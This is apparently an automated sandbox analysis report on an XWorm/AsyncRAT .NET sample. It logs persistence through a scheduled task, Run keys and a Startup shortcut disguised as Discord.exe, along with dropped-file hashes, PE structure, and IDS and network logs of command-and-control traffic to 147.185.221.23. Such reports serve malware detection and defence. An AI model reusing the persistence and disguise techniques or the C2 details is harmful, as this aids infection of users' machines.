                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
12:52:02 | API Interceptor | 51x Sleep call for process: powershell.exe modified
12:52:53 | API Interceptor | 634151x Sleep call for process: s3OBQLA3xR.exe modified
17:52:54 | Task Scheduler | Run new task: Discord path: C:\Users\user\AppData\Roaming\Discord.exe
17:52:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Discord C:\Users\user\AppData\Roaming\Discord.exe
17:53:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Discord C:\Users\user\AppData\Roaming\Discord.exe
17:53:13 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.95.112.1 | W1FREE.exe | Get hash | malicious | XWorm | Browse
• ip-api.com/line/?fields=hosting
| Tracking#1Z379W410424496200.vbs | Get hash | malicious | AgentTesla | Browse
• ip-api.com/line/?fields=hosting
| facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
• ip-api.com/line/?fields=hosting
| Orden de Compra 097890.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
• ip-api.com/line/?fields=hosting
| PO.exe | Get hash | malicious | AgentTesla | Browse
• ip-api.com/line/?fields=hosting
| Purchase_Order.exe | Get hash | malicious | AgentTesla | Browse
• ip-api.com/line/?fields=hosting
| 4HyAcc2Dct.exe | Get hash | malicious | AgentTesla | Browse
• ip-api.com/line/?fields=hosting
| kUFcZgip68.exe | Get hash | malicious | AgentTesla | Browse
• ip-api.com/line/?fields=hosting
| download.exe | Get hash | malicious | AgentTesla | Browse
• ip-api.com/line/?fields=hosting
| 2ktrFR0W3v.exe | Get hash | malicious | Clipboard Hijacker, Quasar | Browse
• ip-api.com/json/
147.185.221.23 | W1FREE.exe | Get hash | malicious | XWorm | Browse
| x2Yi9Hr77a.exe | Get hash | malicious | XWorm | Browse
| H2f8SkAvdV.exe | Get hash | malicious | Blank Grabber, XWorm | Browse
| A39tzaySzX.exe | Get hash | malicious | AsyncRAT, XWorm | Browse
| H1N45BQJ8x.exe | Get hash | malicious | XWorm | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ip-api.com | W1FREE.exe | Get hash | malicious | XWorm | Browse
• 208.95.112.1
| Tracking#1Z379W410424496200.vbs | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| Orden de Compra 097890.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| PO.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| Purchase_Order.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| 4HyAcc2Dct.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| kUFcZgip68.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| download.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| 2ktrFR0W3v.exe | Get hash | malicious | Clipboard Hijacker, Quasar | Browse
• 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TUT-ASUS | W1FREE.exe | Get hash | malicious | XWorm | Browse
• 208.95.112.1
| Tracking#1Z379W410424496200.vbs | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| Orden de Compra 097890.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| PO.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| Purchase_Order.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| 4HyAcc2Dct.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| kUFcZgip68.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| download.exe | Get hash | malicious | AgentTesla | Browse
• 208.95.112.1
| 2ktrFR0W3v.exe | Get hash | malicious | Clipboard Hijacker, Quasar | Browse
• 208.95.112.1
SALSGIVERUS | W1FREE.exe | Get hash | malicious | XWorm | Browse
• 147.185.221.23
| dHp58IIEYz.exe | Get hash | malicious | XWorm | Browse
• 147.185.221.22
| Lr87y2w72r.exe | Get hash | malicious | XWorm | Browse
• 147.185.221.18
| 7LwVrYH7sy.exe | Get hash | malicious | XWorm | Browse
• 147.185.221.18
| 432mtXKD3l.exe | Get hash | malicious | XWorm | Browse
• 147.185.221.22
| 5q4X9fRo4b.exe | Get hash | malicious | AsyncRAT, XWorm | Browse
• 147.185.221.17
| l18t80u9zg.exe | Get hash | malicious | XWorm | Browse
• 147.185.221.22
| Windows Defender.exe | Get hash | malicious | XWorm | Browse
• 147.185.221.22
| x2Yi9Hr77a.exe | Get hash | malicious | XWorm | Browse
• 147.185.221.23
| e7WMhx18XN.exe | Get hash | malicious | SilentXMRMiner, Xmrig | Browse
• 147.185.221.22
                                    No context
                                    No context
                                    Process:C:\Users\user\AppData\Roaming\Discord.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):654
                                    Entropy (8bit):5.380476433908377
                                    Encrypted:false
                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    File Type:Generic INItialization configuration [WIN]
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):3.6722687970803873
                                    Encrypted:false
                                    SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                    MD5:DE63D53293EBACE29F3F54832D739D40
                                    SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                    SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                    SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                    Malicious:false
                                    Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):358912
                                    Entropy (8bit):3.7321662222649703
                                    Encrypted:false
                                    SSDEEP:1536:Fnnl3cS+NOAiebtmUcpCzb6HmnIOkPTbepp65U:FlMSSOQbtmpROkPPevSU
                                    MD5:8090C678B1AB88D330D94A8012682263
                                    SHA1:062E28C4A590A278CEFF6A3931498D53DB6812EC
                                    SHA-256:2B2A240FBDA2933B546A6D1B495D21878B9BF67DA1C7E5B4CAD29C8B82C5D706
                                    SHA-512:ECD6B917EAB7D2E62006E58DA5E839AF15EF6ABDF1ECF35DBFE2F6E354EF81E5FE23254480E5E6E5D8DD843C954BB23EF1331132485F08AA7737F0D27D2634A8
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 76%
                                    • Antivirus: Virustotal, Detection: 65%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..g.....................d.......3... ...@....@.. ....................................@.................................43..W....@...a........................................................................... ............... ..H............text........ ...................... ..`.rsrc....a...@...b..................@..@.reloc...............x..............@..B................p3......H........c..@.......&.....................................................(....*.r...p*. ..e.*..(....*.r...p*. ....*.s.........s.........s.........s.........*.r-..p*. .1z.*.rC..p*. .W..*.rY..p*. ....*.ro..p*. ~.H.*.r...p*. 8=..*..((...*.r...p*. .*b.*.r...p*. .3g.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. ..u.*.r...p*. .M..*.r"..p*. ..}.*.r8..p*. ..~.*.r...p*. ....*.r...p*. e...*.r@.
                                    Process:C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 15:52:52 2024, mtime=Sun Oct 13 15:52:52 2024, atime=Sun Oct 13 15:52:52 2024, length=358912, window=hide
                                    Category:dropped
                                    Size (bytes):764
                                    Entropy (8bit):5.069927998898393
                                    Encrypted:false
                                    SSDEEP:12:86vvL1246YLHWCTDdY//tuKlLdN+8KbhiUjAs15rH9q0ZBmV:86vv16YaMD+g+DKb/AszZq0ZBm
                                    MD5:D02AEC4CE76850C4E6F32123EC2622D7
                                    SHA1:B8C5BA5509A32AFF6C8B26DEA1D8DF615FD9FC93
                                    SHA-256:D5369E84B4A47CC3D41BD28449E38D2549425784B2CEF92FF84832682DDB8AA9
                                    SHA-512:D2BC36EE8E6C663155AF89DFE40FE93C721ADDBB9BE2DC7F245AD86F2D1424FFBA4834AFF1D54F64DE3DF317AD534BA7AACA3100AEAD1090EBACE726E896A85B
                                    Malicious:false
                                    Preview:L..................F.... ...a..X....a..X....a..X.....z......................v.:..DG..Yr?.D..U..k0.&...&......vk.v......2....DD9X........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^MY|............................%..A.p.p.D.a.t.a...B.V.1.....MYz...Roaming.@......CW.^MYz.............................&.R.o.a.m.i.n.g.....b.2..z..MY.. .Discord.exe.H......MY..MY......L........................D.i.s.c.o.r.d...e.x.e.......Y...............-.......X...........B........C:\Users\user\AppData\Roaming\Discord.exe........\.....\.....\.....\.....\.D.i.s.c.o.r.d...e.x.e.`.......X.......051829...........hT..CrF.f4... .e.......,.......hT..CrF.f4... .e.......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):3.7321662222649703
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:s3OBQLA3xR.exe
                                    File size:358'912 bytes
                                    MD5:8090c678b1ab88d330d94a8012682263
                                    SHA1:062e28c4a590a278ceff6a3931498d53db6812ec
                                    SHA256:2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706
                                    SHA512:ecd6b917eab7d2e62006e58da5e839af15ef6abdf1ecf35dbfe2f6e354ef81e5fe23254480e5e6e5d8dd843c954bb23ef1331132485f08aa7737f0d27d2634a8
                                    SSDEEP:1536:Fnnl3cS+NOAiebtmUcpCzb6HmnIOkPTbepp65U:FlMSSOQbtmpROkPPevSU
                                    TLSH:7A74E6E87798BF16D5BECFBC08B192129D79BD139913910B728436C90633ACB8532DE5
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..g.....................d.......3... ...@....@.. ....................................@................................
                                    Icon Hash:0f2b69d4d44d330f
                                    Entrypoint:0x41338e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x670BE87C [Sun Oct 13 15:34:20 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                     Instruction
                                     jmp dword ptr [00402000h]
                                     add byte ptr [eax], al   (this line repeats 97 times in the original listing: the bytes after the 6-byte entry stub are zero padding, which the disassembler renders as add byte ptr [eax], al)
                                     The entry stub jumps through the IAT slot at RVA 0x2000 (image base 0x400000; see IMAGE_DIRECTORY_ENTRY_IAT below), and the only import is mscoree.dll!_CorExeMain. This is the standard native stub of a managed executable: the sample's real logic is CIL and has to be read with a .NET decompiler, not from this disassembly.
                                     Name | Virtual Address | Virtual Size | Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13334 | 0x57 | .text
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x461da | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5c000 | 0xc | .reloc
                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                     .text | 0x2000 | 0x11394 | 0x11400 | 3511a25db0664d02f5fe8d510d03c11c | False | 0.5959437273550725 | data | 6.072669550830597 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                     .rsrc | 0x14000 | 0x461da | 0x46200 | f660424e29963900dc0bd6e6dd0414e4 | False | 0.03251726827094474 | data | 2.5681539357127345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .reloc | 0x5c000 | 0xc | 0x200 | 1f6912a6eb0911523c9bfd491727d10c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                     RT_ICON | 0x141c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.32180851063829785
                                     RT_ICON | 0x14628 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.18785178236397748
                                     RT_ICON | 0x156d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.17074688796680498
                                     RT_ICON | 0x17c78 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | | | 0.020719294611947808
                                     RT_GROUP_ICON | 0x59ca0 | 0x3e | data | | | 0.7580645161290323
                                     RT_VERSION | 0x59ce0 | 0x310 | data | | | 0.4362244897959184
                                     RT_MANIFEST | 0x59ff0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                     DLL | Import
                                     mscoree.dll | _CorExeMain
                                     Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                     2024-10-13T18:53:03.649760+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:03.649760+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:06.230258+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:06.231787+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:53:17.851676+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:53:18.164978+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:18.172927+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:53:30.105647+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:30.108364+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:53:33.655222+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:33.655222+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:42.035887+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:42.037340+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:53:53.980479+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:53.982449+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:53:58.194733+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:53:58.197296+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:54:00.345370+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:54:00.347724+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:54:00.560207+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:54:00.563723+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:54:01.284864+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:54:01.289531+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     2024-10-13T18:54:03.650096+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:54:03.650096+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:54:10.359906+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
                                     2024-10-13T18:54:10.360654+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Oct 13, 2024 18:52:01.316148043 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                     Oct 13, 2024 18:52:01.321202040 CEST | 80 | 49730 | 208.95.112.1 | 192.168.2.4
                                     Oct 13, 2024 18:52:01.321300030 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                     Oct 13, 2024 18:52:01.321923971 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                     Oct 13, 2024 18:52:01.326750040 CEST | 80 | 49730 | 208.95.112.1 | 192.168.2.4
                                     Oct 13, 2024 18:52:01.818238974 CEST | 80 | 49730 | 208.95.112.1 | 192.168.2.4
                                     Oct 13, 2024 18:52:01.866627932 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                     Oct 13, 2024 18:52:48.242077112 CEST | 80 | 49730 | 208.95.112.1 | 192.168.2.4
                                     Oct 13, 2024 18:52:48.242151022 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                     Oct 13, 2024 18:52:53.893053055 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:52:53.899662971 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:52:53.899745941 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:52:53.945575953 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:52:53.950433016 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:03.649760008 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:03.695147991 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:05.918101072 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:05.923027992 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:06.230257988 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:06.231786966 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:06.236743927 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:17.851675987 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:17.856710911 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:18.164978027 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:18.172926903 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:18.177800894 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:29.789439917 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:29.794426918 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:30.105647087 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:30.108364105 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:30.113280058 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:33.655221939 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:33.710870981 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:41.726871967 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:41.732114077 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:41.837747097 CEST | 49730 | 80 | 192.168.2.4 | 208.95.112.1
                                     Oct 13, 2024 18:53:41.843002081 CEST | 80 | 49730 | 208.95.112.1 | 192.168.2.4
                                     Oct 13, 2024 18:53:42.035887003 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:42.037339926 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:42.042201042 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:53.664572954 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
